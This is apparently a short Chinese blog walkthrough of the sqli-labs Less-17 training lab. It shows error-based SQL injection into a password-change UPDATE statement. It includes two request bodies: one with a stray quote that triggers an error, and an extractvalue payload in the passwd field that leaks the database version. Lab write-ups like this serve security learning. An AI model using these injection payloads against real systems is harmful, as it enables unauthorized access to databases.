Less17
本关可以看到是一个修改密码的过程,利用的是update语句,与再用select时是一样的。
尝试报错:
1 | uname=admin&passwd=11'&submit=Submit |
可以看到sql语句报错
尝试一下报错注入:
1 | uname=admin&passwd=11'and extractvalue(1,concat(0x7e,(select @@version),0x7e))#&submit=Submit |
sqli-labs靶场Less-17(update注入)
- 本文链接: https://www.hzktester.top/posts/cb3a4153.html
- 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!